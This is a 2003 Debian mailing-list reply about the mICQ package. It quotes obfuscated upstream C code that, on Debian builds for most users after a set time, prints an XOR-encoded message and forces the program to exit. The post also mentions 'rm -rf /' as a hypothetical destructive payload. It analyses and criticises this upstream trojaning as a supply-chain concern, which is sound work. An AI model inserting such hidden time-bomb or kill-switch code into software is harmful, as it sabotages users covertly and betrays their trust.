[Ruediger, Joerg, cc'ed for your convenience since you're mentioned by name and may wish to respond] On Thu, Feb 13, 2003 at 04:14:20PM +0100, Martin Loschwitz wrote: > Again, this "easter egg" is debian specific - it will only occur on computers > running Debian and using the official Debian mICQ package. So, basically, what you're saying is that you uploaded a package to Debian that included some malicious and obfuscated code from upstream, that neither you nor your sponsor (Joerg Jaspert according to the signature on the .changes; who appears to be Ruediger's AM too) spotted. The code in question, for those playing along at home, is (with minor reformatting to fit into 80 cols): #if defined(__Dbn__) && __Dbn__ != -1 && !defined (EXTRAVERSION) if (me[0] != 'm' || me[1] != 'a' || me[2] != 'd' || me[3] != 'k' || me[4] != 'i' || me[5] != 's' || me[6] != 's' || me[7]) if (time (NULL) > 1045000000) { const char *parts[] = { "\n\n\eX0282nZlv$qf#vpjmd#wkf#nJ@R#sb`hbdf#sqlujgfg#az", "#Gfajbm-#Pjm`f#wkf#Gfajbm#nbjmwbjmfq#jp#f{wqfnfoz#", "vm`llsfqbwjuf/#zlv$qf#bguj`fg#wl#vpf#wkf#afwwfq#rv", "bojwz#sb`hbdf#eqln#nj`r-lqd-#Pjnsoz#bgg#wkf#eloolt", "jmd#ojmf#wl#zlvq#,fw`,bsw,plvq`fp-ojpw#wl#wqb`h#pw", "baof#ufqpjlmp#le#nJ@R9\eX3n\ngfa#kwws9,,ttt-nj`r-lqd", ",gfajbm#pwbaof#nbjm\n\eX0282nWl#wqb`h#@UP#pmbspklwp/", "#bgg9\eX3n\ngfa#kwws9,,ttt-nj`r-lqd,gfajbm#wfpwjmd#n", "bjm\n\eX0282nPlvq`f#sb`hbdfp#nbz#af#qfwqjfufg#pjnjob", "qoz-\eX3n\n\n " }; char buf[52]; int i, j; for (i = 0; i < 10; i++) { for (j = 0; j < 50; j++) buf[j] = parts[i][j] > 30 ? parts[i][j] ^ 3 : parts[i][j]; buf[j] = '\0'; M_print (buf); } exit (99); } #endif Given the recent spate of exploits of upstream ftp sites and security problems with CVS, and so forth, that this has happened seems fairly concerning to me. > In my opinion, with this step, mICQ has proven as dishonorable to be > distributed with Debian anymore (especially since nobody knows what idea > upstream will have as next, maybe it's a very funny 'rm -rf /'?). Thus, i > would like to request removal of the package from distribution. As maintainer of the package, you don't have to give any reasons for requesting its removal. > Additionally, I suggest to consider to add this piece of software to the > "unable to package" list[1]. On the other hand, this makes no sense at all. The package doesn't have intractable security holes, or license problems, and the bugs that've gotten us into this mess are all trivial to fix. From what I've read of his posts, the upstream author doesn't even seem particularly unreasonable in any of his demands, or even particularly more obnoxious than various other people around the place. So anyway, as a new maintainer candidate who's apparently already passed the various checks, what are your thoughts on: (a) avoiding packages that've been trojaned upstream entering Debian, either through a Debian maintainer or via the sponsorship system? (b) how to best interact with upstream maintainers that can get exceedingly obnoxious? Personally, "drop any and all packages that these could affect" seems like a pretty poor solution, both in that it loses the most functionality of all possible solutions, and in that it can only be done after the fact. Cheers, aj -- Anthony Towns <aj@humbug.org.au> <http://azure.humbug.org.au/~aj/> I don't speak for anyone save myself. GPG signed mail preferred. ``Dear Anthony Towns: [...] Congratulations -- you are now certified as a Red Hat Certified Engineer!''
Attachment:
pgpStWXtmbAOg.pgp
Description: PGP signature